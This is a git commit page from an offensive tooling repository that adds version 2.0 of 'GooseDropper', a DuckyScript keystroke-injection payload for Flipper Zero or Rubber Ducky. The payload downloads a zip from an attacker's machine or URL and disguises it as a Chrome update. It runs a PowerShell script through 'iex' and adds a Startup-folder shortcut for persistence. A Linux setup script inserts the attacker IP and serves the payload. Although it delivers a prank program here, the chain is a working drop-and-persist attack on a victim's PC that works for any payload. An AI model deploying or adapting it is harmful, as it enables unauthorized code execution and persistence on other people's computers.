0xvoodoo/Misadventures
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Dropper v2.0

Browse Source
This commit is contained in:
Fr3ki
2023-10-31 15:10:53 -06:00
parent 51df053bc7
commit 665b59a62a
10 changed files with 122 additions and 23 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Duckyscripts/GooseDropper/GooseDropper.txt
+7 -2
View File
@@ -4,9 +4,9 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r
DELAY 500 DELAY 500
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell wget YOUR_IP:1337/update.zip -OutFile $ENV:Temp/Updater.zip STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
ENTER ENTER
DELAY 5000 DELAY 8000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
@@ -14,5 +14,10 @@ ENTER
DELAY 3000 DELAY 3000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
ENTER
DELAY 1000
GUI r
DELAY 500
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
ENTER ENTER
Duckyscripts/GooseDropper/PersistentGoose.ps1
+6
View File
@@ -0,0 +1,6 @@
$WScriptShell = New-Object -ComObject WScript.Shell
$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
Duckyscripts/GooseDropper/README.md
+14 -10
View File
@@ -1,23 +1,27 @@
======= Goose Dropper ======== **======= Goose Dropper v2.0 ========**
This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose on a Windows PC. This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
------------------------------------------------------------------------------------------------------
Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually: Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
1) Replace the YOUR_IP value in GooseDropper.txt with your IP 1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
2) Download Desktop Goose and extract it, rename the DesktopGoose v.031 from inside the zip to Update 2) Download Desktop Goose and extract it, rename the 'DesktopGoose v.031' folder from inside the zip to Update.
3) Re-ZIP the Update directory and name it Chrome_Updater.txt 3) Copy PersistentGoose.ps1 into the newly renamed Update folder.
4) Start some form of simple webserver/fileshare on port 1337 4) Re-ZIP the Update directory and name it Chrome_Updater.txt.
5) Copy to your Flipper or Rubber-Ducky and PWN! 5) Start some form of simple webserver/fileshare on port 1337 (or change the port to reflect your choice).
Important Notes: 6) Copy to your Flipper or Rubber-Ducky and PWN!
--------------------------------------------------------------------------------------------------------------
**Important Notes:**
Ensure configuration is run while on the same network as your target, re-configure with each new network. Ensure configuration is run while on the same network as your target, re-configure with each new network.
Currently a reboot will kill the process, however persistance is being worked on.
All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
Duckyscripts/GooseDropper/linux_setup.sh
+55 -6
View File
@@ -1,15 +1,44 @@
#!/bin/bash #!/bin/bash
#Determine the source of the DesktopGoose download
echo "1) Local Webserver | 2) Persistant URL"
read -p "Select a download source [1/2]: " DL
if [ "${DL}" == "1" ];
then
echo "Grabbing your IP"
#Grab your local IP to add to the payload #Grab your local IP to add to the payload
SRC="$(ip route show | grep default | cut -d ' ' -f 9)" SRC="$(ip route show | grep default | cut -d ' ' -f 9)"
#Add your IP to the payload
sed -i "s/YOUR_IP/$SRC/" GooseDropper.txt
sleep 5s && clear
elif [ "${DL}" == "2" ];
then
#Get your URL
read -p "Enter your URL: " SRC
#Add your URL to the payload
sed -i "s/powershell wget YOUR_IP:1337 -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
#Remind users to have the zip ready
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
sleep 5s && clear
else
echo "Please enter a valid selection"
exit
fi
#Check if Desktop Goose is present in this directory #Check if Desktop Goose is present in this directory
GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')" GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
#Add the IP to the payload
sed -i "s/YOUR_IP/$SRC/" GooseDroper.txt
#Check
if [ "${GOOSE}" == "" ]; if [ "${GOOSE}" == "" ];
then then
echo "Desktop Goose is not present in this directory, download it, or move it here" echo "Desktop Goose is not present in this directory, download it, or move it here"
@@ -18,16 +47,36 @@ then
else else
unzip "Desktop Goose v0.31.zip" unzip "Desktop Goose v0.31.zip"
mv "Desktop Goose v0.31/DesktopGoose v0.31" Update mv "Desktop Goose v0.31/DesktopGoose v0.31" Update
mv PersistentGoose.ps1 Update/
zip -r Chrome_Update.zip Update zip -r Chrome_Update.zip Update
rm -rf "Desktop Goose v0.31"* Update rm -rf "Desktop Goose v0.31"* Update
read -p "Configuration finished! Start python webserver now? [Y/N]" START clear
fi fi
read -p "Configure Persistence? [Y/N]: " PERSIST
if [ "${PERSIST,,}" == "n" ];
then
sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
else
break
fi
if [ "${DL}" == "1" ];
then
clear
read -p "Configuration finished! Start python webserver now? [Y/N]: " START
clear
else
clear
break
fi
if [ "${START,,}" == "y" ]; if [ "${START,,}" == "y" ];
then then
echo "Starting Server... Happy PWNing! (don't be a skid)"
python3 -m http.server 1337 && echo "PWNED!" python3 -m http.server 1337 && echo "PWNED!"
else else
clear clear
echo "Server not started, thank you!" echo "Finished... Happy PWNing (don't be a skid)!"
fi fi
Duckyscripts/GooseDropper/testing/.gitignore
View File
Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip
BIN
View File
Binary file not shown.
Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk
+23
View File
@@ -0,0 +1,23 @@
REM TITLE GooseDropper
REM AUTHOR Fr3ki
REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
DELAY 500
GUI r
DELAY 500
STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
ENTER
DELAY 8000
GUI r
DELAY 500
STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
ENTER
DELAY 3000
GUI r
DELAY 500
STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
ENTER
DELAY 1000
GUI r
DELAY 500
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
ENTER
Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk
+6
View File
@@ -0,0 +1,6 @@
$WScriptShell = New-Object -ComObject WScript.Shell
$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip
BIN
View File
Binary file not shown.
Duckyscripts/GooseDropper/testing/recover.sh
+6
View File
@@ -0,0 +1,6 @@
#!/bin/bash
cp PersistentGoose.ps1.bk PersistentGoose.ps1
cp "bk_Desktop Goose v0.31.zip" "Desktop Goose v0.31.zip"
cp GooseDropper.txt.bk GooseDropper.txt
rm Chrome_Update.zip